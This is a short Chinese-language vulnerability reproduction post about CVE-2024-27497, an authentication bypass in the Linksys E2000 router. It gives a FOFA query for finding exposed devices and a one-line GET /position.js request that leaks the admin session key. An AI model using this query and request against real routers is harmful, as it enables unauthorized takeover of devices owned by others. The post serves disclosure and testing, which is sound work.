【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科(Cisco)品牌推出的无线路由器,它是一款支持2.4GHz和5GHz双频段的无线路由器,用户可以避开拥挤的2.4GHz频段,独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。

0x03 测绘语句

复制代码
FOFA:app="LINKSYS-E2000"

0x04 漏洞复现

复制代码
GET /position.js HTTP/1.1
复制代码
如访问 /position.js路由存在 session_key和close_session字段,则证明存在此漏洞。

0x05 影响范围

复制代码
Linksys E2000 v1.0.06

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
Lightning-py19 分钟前
Linux命令cat /proc/net/snmp查看网络协议层面统计信息
网络·网络协议·tcp/ip
newxtc23 分钟前
【JJ斗地主-注册安全分析报告】
开发语言·javascript·人工智能·安全
wo3258661451 小时前
浪潮交换机配置track检测实现高速公路收费网络主备切换NQA
开发语言·网络·php
光路科技2 小时前
TSN交换机正在重构工业网络,PROFINET和EtherCAT会被取代吗?
服务器·网络·重构
毒果3 小时前
网络安全全景解析
安全·web安全
云盾安全防护3 小时前
CC攻击与WAF的对抗战
网络·安全·ddos
还是鼠鼠4 小时前
HTTP 请求协议简单介绍
java·开发语言·网络·网络协议·http
网硕互联的小客服5 小时前
如何在服务器上部署 Python Django 应用
linux·运维·服务器·网络·安全
渗透好难5 小时前
CTF show 数学不及格
安全·系统安全·密码学
百度安全6 小时前
BCS 2025|百度副总裁陈洋:智能体在安全领域的应用实践
安全·百度